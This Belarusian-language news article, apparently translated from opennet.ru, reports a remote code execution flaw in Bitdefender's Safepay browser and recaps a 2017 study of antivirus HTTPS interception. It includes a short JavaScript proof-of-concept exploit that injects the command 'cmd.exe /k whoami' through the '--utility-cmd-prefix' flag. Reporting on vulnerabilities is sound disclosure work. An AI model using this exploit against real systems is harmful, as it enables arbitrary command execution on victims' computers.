Уладзімір Палант, стваральнік Adblock Plus, () у заснаваным на рухавічку Chromium спецыялізаваным web-браўзэры Safepay, прапанаваным у складзе антывіруснага пакета Bitdefender Total Security 2020 і накіраваным на павышэнне бяспекі працы карыстальніка ў глабальнай сетцы (напрыклад, прадастаўляецца дадатковая ізаляцыя пры звароце да банкаў і плацежных сістэм). Уразлівасць дае магчымасць адчыняным у браўзэры сайтам выканаць адвольны код на ўзроўні аперацыйнай сістэмы.
Чыннік праблемы ў тым, што антывірус Bitdefender выконвае лакальны перахоп HTTPS-трафіку праз падмену арыгінальнага TLS-сертыфіката сайта. На сістэме кліента ўстанаўліваецца дадатковы каранёвы сертыфікат, які дазваляе схаваць працу прымяняецца сістэмы інспектавання трафіку. Антывірус укліньваецца ў абаронены трафік і падстаўляе ў некаторыя старонкі ўласны JavaScript-код для рэалізацыі функцыі Safe Search, а ў выпадку праблем з сертыфікатам абароненага злучэння падмяняе выдаваную старонку з памылкай на ўласную. Так як новая старонка з памылкай выдаецца ад імя адчынянага сервера, іншыя старонкі дадзенага сервера маюць поўны доступ да змесціва, які ўстаўляецца Bitdefender.
Пры адкрыцці падкантрольнага зламысніку сайта гэты сайт можа адправіць запыт XMLHttpRequest і сімуляваць пры адказе праблемы з HTTPS-сертыфікатам, што прывядзе да вяртання старонкі з памылкай, падмененай Bitdefender. Бо старонка з памылкай адчыненая ў кантэксце дамена атакавалага, ён можа прачытаць змесціва падмененай старонкі з параметрамі Bitdefender. На старонцы, якая падстаўляецца Bitdefender, у тым ліку прысутнічае сесійны ключ, які дазваляе пры дапамозе ўнутранага API Bitdefender запусціць асобны сеанс браўзэра Safepay, паказаўшы пры гэтым адвольныя сцягі каманднага радка, і дамагчыся запуску любых сістэмных каманд пры дапамозе сцяга «—utility-cmd-prefix». Прыклад эксплоіту (param1 і param2 — значэнні, атрыманыя са старонкі з памылкай):
var request = new XMLHttpRequest();
request.open("POST", Math.random());
request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
request.setRequestHeader(«BDNDSS_B67EA559F21B487F861FDA8A44F01C50», param1);
request.setRequestHeader(«BDNDCA_BBACF84D61A04F9AA66019A14B035478», param2);
request.setRequestHeader(«BDNDWB_5056E556833D49C1AF4085CB254FC242», «obk.run»);
request.setRequestHeader(«BDNDOK_4E961A95B7B44CBCA1907D3D3643370D», location.href);
request.send("data:text/html,nada -utility-cmd-prefix=\"cmd.exe /k whoami & echo\"");
Нагадаем, што праведзенае ў 2017 годзе даследаванне , Што 24 з 26 пратэставаных антывірусных прадуктаў, якія інспектуюць HTTPS-трафік праз падмену сертыфікатаў, змяншалі агульны ўзровень бяспекі HTTPS-злучэнні.
Актуальныя наборы шыфраў даваліся толькі ў 11 з 26 прадуктаў. 5 сістэм не ажыццяўлялі верыфікацыю сертыфікатаў (Kaspersky Internet Security 16 Mac, NOD32 AV 9, CYBERsitter, Net Nanny 7 Win, Net Nanny 7 Mac). Прадукты Kaspersky Internet Security і Total Security былі схільныя нападу , а прадукты AVG, Bitdefender і Bullguard атакам и . Прадукт Dr.Web Antivirus 11 дазваляе адкаціцца на ненадзейныя экспартныя шыфры (атака ).
Крыніца: opennet.ru